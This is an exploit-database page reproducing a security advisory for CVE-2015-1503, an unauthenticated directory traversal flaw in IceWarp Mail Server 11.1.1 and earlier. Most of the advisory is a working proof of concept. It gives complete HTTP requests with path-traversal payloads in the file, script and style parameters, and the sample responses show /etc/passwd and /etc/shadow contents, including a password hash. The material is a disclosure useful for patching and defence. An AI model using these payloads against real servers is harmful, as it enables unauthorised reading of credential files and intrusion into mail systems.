0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
IceWarp Mail Server < 11.1.1 - Directory Traversal Vulnerability
Author
Risk
[Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Vendor: IceWarp (http://www.icewarp.com) Product: IceWarp Mail Server Version affected: 11.1.1 and below Product description: IceWarp WebMail provides web-based access to email, calendars, contacts, files and shared data from any computer with a browser and Internet connection. IceWarp Mail Server is a commercial mail and groupware server developed by IceWarp Ltd. It runs on Windows and Linux. Finding 1: Multiple Unauthenticated Directory traversal Credit: Piotr Karolak of Trustwave's SpiderLabs CVE: CVE-2015-1503 CWE: CWE-22 #Proof of Concept The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request to the /webmail/client/skins/default/css/css.php. Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory. This vulnerability affects /-.._._.--.._1416610368(variable, depending on the installation, need to check page source)/webmail/client/skins/default/css/css.php. Attack details URL GET input file was set to ../../../../../../../../../../etc/passwd Proof-of-Concept: The GET or POST request might be sent to the host A.B.C.D where the IceWarp mail server is running: REQUEST ======= GET /-.._._.--.._1416610368/webmail/client/skins/default/css/css.php?file=../../../../../../../../../../etc/passwd&palette=default&skin=default HTTP/1.1 Referer: http://a.b.c.d/ Cookie: PHPSESSID_BASIC=wm-54abaf5b3eb4d824333000; use_cookies=1; lastLogin=en%7Cbasic; sess_suffix=basic; basic_disable_ip_check=1; lastUsername=test; language=en Host: a.b.c.d Connection: Keep-alive Accept-Encoding: gzip,deflate Accept: */* RESPONSE: ========= root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin ....TRUNCATED test:x:1000:1000:test,,,:/home/test:/bin/bash smmta:x:116:125:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false smmsp:x:117:126:Mail Submission Program,,,:/var/lib/sendmail:/bin/false mysql:x:118:127:MySQL Server,,,:/nonexistent:/bin/false The above proof-of-concept would retrieve the /etc/passwd file (the response in this example has been truncated). #Proof of Concept The unauthenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET and POST request payload ..././..././..././..././..././..././..././..././..././..././etc/shadow submitted in the script and/or style parameter. Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commands outside of the web server's root directory. The script and style parameters are vulnerable to path traversal attacks, enabling read access to arbitrary files on the server. REQUEST 1 ========= GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1 Host: a.b.c.d Accept: */* Accept-Language: en Connection: close Referer: http://a.b.c.d/webmail/old/calendar/index.html?_n[p][content]=event.main&_n[p][main]=win.main.public&_n[w]=main Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en REQUEST 2 ========= GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fshadow HTTP/1.1 Host: a.b.c.d Accept: */* Accept-Language: en Connection: close Cookie: use_cookies=1; PHPSESSID_LOGIN=08dj6q5s8tlmn126fo3vg80n47; sess_suffix=basic; lastUsername=test; PHPSESSID_CALENDAR=ji3306tg3fecg1foun2ha6dnu1; GUI=advanced; LANG=TURKISH; PHPSESSID_BASIC=wm-54a5b90472921449948637; lastLogin=en%7Cpda; prefered_version=0; PHPSESSID_PDA=ji3306tg3fecg1foun2ha6dnu1; language=en RESPONSE ======== HTTP/1.1 200 OK Connection: close Server: IceWarp/11.1.1.0 Date: Thu, 03 Jan 2015 06:44:23 GMT Content-type: text/javascript; charset=utf-8 root:!:16436:0:99999:7::: daemon:*:16273:0:99999:7::: bin:*:16273:0:99999:7::: sys:*:16273:0:99999:7::: sync:*:16273:0:99999:7::: games:*:16273:0:99999:7::: man:*:16273:0:99999:7::: lp:*:16273:0:99999:7::: ....TRUNCATED lightdm:*:16273:0:99999:7::: colord:*:16273:0:99999:7::: hplip:*:16273:0:99999:7::: pulse:*:16273:0:99999:7::: test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7::: smmta:*:16436:0:99999:7::: smmsp:*:16436:0:99999:7::: mysql:!:16436:0:99999:7::: # 0day.today [2024-11-16] #